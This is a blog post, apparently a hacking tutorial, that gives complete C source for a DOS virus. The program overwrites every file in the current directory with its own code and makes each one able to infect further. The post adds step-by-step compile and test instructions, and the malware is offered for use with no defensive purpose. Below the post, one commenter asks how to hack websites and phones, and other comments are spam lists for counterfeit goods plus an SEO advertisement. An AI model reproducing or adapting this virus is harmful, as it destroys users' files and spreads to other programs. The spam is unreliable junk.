This program is an example of how to create a virus in C. This program demonstrates a simple virus program which upon execution (Running) creates a copy of itself in the other file. Thus it destroys other files by infecting them. But the virus infected file is also capable of spreading the infection to another file and so on. Here’s the source code of the virus program.
#include<stdio.h>
#include<io.h>
#include<dos.h>
#include<dir.h>
#include<conio.h>
#include<time.h> FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;
void main()
{
st=clock();
clrscr();
done=findfirst(“*.*”,&ffblk,0);
while(!done)
{
virus=fopen(_argv[0],”rb”);
host=fopen(ffblk.ff_name,”rb+”);
if(host==NULL) goto next;
x=89088;
printf(“Infecting %s\n”,ffblk.ff_name,a);
while(x>2048)
{
fread(buff,2048,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();
done=findnext(&ffblk);
}
}
printf(“DONE! (Total Files Infected= %d)”,a);
end=clock();
printf(“TIME TAKEN=%f SEC\n”,
(end-st)/CLK_TCK);
getch();
}
COMPILING METHOD:
USING BORLAND TC++ 3.0 (16-BIT):
1. Load the program in the compiler, press Alt-F9 to compile
2. Press F9 to generate the EXE file (DO NOT PRESS CTRL-F9,THIS WILL INFECT ALL THE FILES IN CUR DIRECTORY INCLUDIN YOUR COMPILER)
3. Note down the size of generated EXE file in bytes (SEE EXE FILE PROPERTIES FOR IT’S SIZE)
4. Change the value of X in the source code with the noted down size (IN THE ABOVE SOURCE CODE x= 89088; CHANGE IT)
5. Once again follow the STEP 1 & STEP 2.Now the generated EXE File is ready to infect
USING BORLAND C++ 5.5 (32-BIT) :
1. Compile once,note down the generated EXE file length in bytes
2. Change the value of X in source code to this length in bytes
3. Recompile it.The new EXE file is ready to infect
HOW TO TEST:
1. Open new empty folder
2. Put some EXE files (BY SEARCHING FOR *.EXE IN SEARCH & PASTING IN THE NEW FOLDER)
3. Run the virus EXE file there you will see all the files in the current directory get infected.
4. All the infected files will be ready to reinfect,
5 Comments
i realy appreciate u guys for dis great job. Pls, i want to knw how hack website. And i want to knw how to hack through my java phone
ReplyDelete0812
ReplyDeletemizuno running shoes
chanel handbags
toms shoes
tommy hilfiger outlet
washington redskins jerseys
yoga pants,lululemon,lululemon outlet,lululemon athletica,lululemon addict,lulu lemon,lulu.com,lululemon.com
burberry outlet store, http://www.burberryoutletonlinestore.com.co
coach outlet
mulberry outlet
indianapolis colts jerseys
canada goose outlet
oakley sunglasses outlet
denver broncos jerseys
nike air max 2014
ugg boots, http://www.uggsoutlet.us.org
phil mcconkey jersey,odell beckham jr jersey,michael strahan jersey,chris snee jersey,larry donnell jersey,peyton hillis jersey,carl banks jersey,lawrence taylor jersey,phil mcconkey jersey,justin tuck jersey,michael boley jersey,chase blackburn jersey
jerome simpson jersey,marcus sherels jersey,phil loadholt jersey,tom johnson jersey
nike free run
jordan shoes, http://www.jordan-shoes.us.com
real madrid soccer jersey
supra footwear
ralph lauren uk
nike outlet store
air jordan 13
christian louboutin shoes
bottega veneta handbags
san antonio spurs jerseys
cheap jordans
cheap oakley sunglasses, http://www.oakleysunglassesdiscount.us.com
nike running shoes
air max 2014
mulberry outlet
nba jerseys, http://www.nbajerseys.us.com
nhl jerseys wholesale
gucci,borse gucci,gucci sito ufficiale,gucci outlet
ReplyDeletenike free 5.0
coach outlet online
oakley outlet
cheap nike shoes
salomon shoes
san antonio spurs jerseys
ray ban sunglasses
coach outlet online
coach outlet
polo lacoste pas cher
nike air max uk
ugg boots, http://www.cheapuggboots.net.co
mcm handbags
hollister clothing
pandora
cleveland cavaliers jersey
true religion outlet, http://www.truereligionoutletstore.us.com
kobe shoes
oakley sunglasses, http://www.oakleysunglassesdiscount.us.com
chicago bears jerseys
mbt shoes
ralph lauren
oakley sunglasses, http://www.oakleysunglasses-outlet.us.com
nike roshe run
swarovski crystal
oakley,occhiali oakley,oakley italia,oakley occhiali,oakley sunglasses
michael kors outlet
the north face uk
thomas sabo uk
timberland shoes
michael kors outlet online, http://www.michaelkorsoutletonlinstore.us.com
puma sneakers
gucci handbags
true religion outlet, http://www.truereligionjean.in.net
2015826caihuali
cheap jordans
ReplyDeletemiami heat
gucci handbags
hermes bags
ugg clearance
michael kors online outlet
black friday
tory burch shoes
new england patriots
basketball shoes
ray-ban sunglasses
valentino shoes
mulberry,mulberry handbags,mulberry outlet,mulberry bags,mulberry uk
rolex watches,swiss watch,replica watches,rolex watches for sale,replica watches uk,rolex watches replica,rolex watches for sales
ugg outlet
philadelphia eagles
nfl jerseys wholesale
chanel handbags
seattle seahawks
chicago bears
ugg outlet
prada handbags
hermes bags
ugg outlet store
roshe run women
kobe bryants shoes 2015
black friday
michael kors outlet online
louis vuitton outlet online
michael kors handbags,michael kors outlet,michael kors outlet online,michael kors,kors outlet,michael kors outlet online sale,michael kors handbags clearance,michael kors purses,michaelkors.com,michael kors bags,michael kors shoes,michaelkors,cheap michael kors
dddd1105
Search Engine Optimization is an Internet marketing tactic that takes into consideration how search engines function and “rank” websites, how people search for keywords, the keywords that are most frequently searched, and the kind of searches (text search, image search, video search) that consumers are likely to use to learn more about the products, services, and business as a whole. You can get yourself certified in digital marketing for free
ReplyDelete